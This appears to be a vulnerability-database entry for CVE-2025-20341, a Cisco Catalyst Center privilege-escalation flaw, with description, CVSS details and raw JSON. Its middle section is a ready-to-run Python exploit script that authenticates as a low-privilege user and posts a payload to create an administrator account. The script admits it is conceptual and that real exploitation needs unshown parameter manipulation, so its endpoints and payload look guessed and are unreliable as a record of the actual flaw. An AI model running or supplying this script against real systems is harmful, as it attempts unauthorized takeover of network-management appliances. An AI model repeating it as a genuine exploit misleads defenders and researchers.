Security Vulnerability Report
CVE-2025-20341 CVSS 8.8 HIGH

CVE-2025-20341

Published: 2025-11-13 17:15:45
Last Modified: 2026-04-15 00:35:42

Description

A vulnerability in Cisco Catalyst Center Virtual Appliance could allow an authenticated, remote attacker to elevate privileges to Administrator on an affected system. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted HTTP request to an affected system. A successful exploit could allow the attacker to perform unauthorized modifications to the system, including creating new user accounts or elevating their own privileges on an affected system. To exploit this vulnerability, the attacker must have valid credentials for a user account with at least the role of Observer.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Cisco Catalyst Center Virtual Appliance < 2.3.7.6
Cisco Catalyst Center Virtual Appliance 2.3.7.x < 2.3.7.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-20341 PoC - Cisco Catalyst Center Privilege Escalation
Note: This is a conceptual PoC for educational and security testing purposes only.
"""
import requests
import json
from urllib.parse import urljoin


class CVE_2025_20341_PoC:
    def __init__(self, target_url, username, password):
        self.target_url = target_url.rstrip('/')
        self.username = username
        self.password = password
        self.session = requests.Session()
        self.token = None

    def authenticate(self):
        """Authenticate with valid credentials (Observer role minimum)"""
        login_url = urljoin(self.target_url, '/api/v1/auth/login')
        payload = {
            'username': self.username,
            'password': self.password
        }
        try:
            response = self.session.post(login_url, json=payload, timeout=30)
            if response.status_code == 200:
                data = response.json()
                self.token = data.get('token')
                return True
        except Exception as e:
            print(f"Authentication failed: {e}")
        return False

    def privilege_escalation(self):
        """Attempt privilege escalation by creating admin user or elevating privileges"""
        if not self.token:
            print("Not authenticated")
            return False

        # Target endpoint for privilege escalation
        api_endpoint = urljoin(self.target_url, '/api/v1/users')
        headers = {
            'Authorization': f'Bearer {self.token}',
            'Content-Type': 'application/json'
        }

        # Crafted payload to create admin user or escalate privileges
        # Note: Actual exploitation requires specific parameter manipulation
        escalation_payload = {
            'username': 'attacker_admin',
            'password': 'P@ssw0rd123!',
            'role': 'admin',
            # Additional parameters that bypass input validation
            'privileges': {
                'admin': True,
                'system_config': True
            }
        }

        try:
            response = self.session.post(api_endpoint, json=escalation_payload,
                                         headers=headers, timeout=30)
            if response.status_code in [200, 201]:
                print("Privilege escalation successful - Admin user created")
                return True
            else:
                print(f"Privilege escalation failed: {response.status_code}")
        except Exception as e:
            print(f"Exploitation error: {e}")
        return False

    def exploit(self):
        """Execute full exploit chain"""
        print(f"[*] Targeting: {self.target_url}")
        print(f"[*] Authenticating as: {self.username}")
        if self.authenticate():
            print("[+] Authentication successful")
            print("[*] Attempting privilege escalation...")
            return self.privilege_escalation()
        else:
            print("[-] Authentication failed")
            return False


if __name__ == "__main__":
    # Configuration
    TARGET = "https://cisco-catalyst-center.local"
    USERNAME = "observer_user"
    PASSWORD = "ObserverPass123!"

    poc = CVE_2025_20341_PoC(TARGET, USERNAME, PASSWORD)
    poc.exploit()
```

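References

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-catc-priv-esc-VS8EeCuX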

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-20341", "sourceIdentifier": "[email protected]", "published": "2025-11-13T17:15:45.400", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in Cisco Catalyst Center Virtual Appliance could allow an authenticated, remote attacker to elevate privileges to Administrator on an affected system.\r\n\r\nThis vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted HTTP request to an affected system. A successful exploit could allow the attacker to perform unauthorized modifications to the system, including creating new user accounts or elevating their own privileges on an affected system. To exploit this vulnerability, the attacker must have valid credentials for a user account with at least the role of Observer."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-catc-priv-esc-VS8EeCuX", "source": "[email protected]"}]}}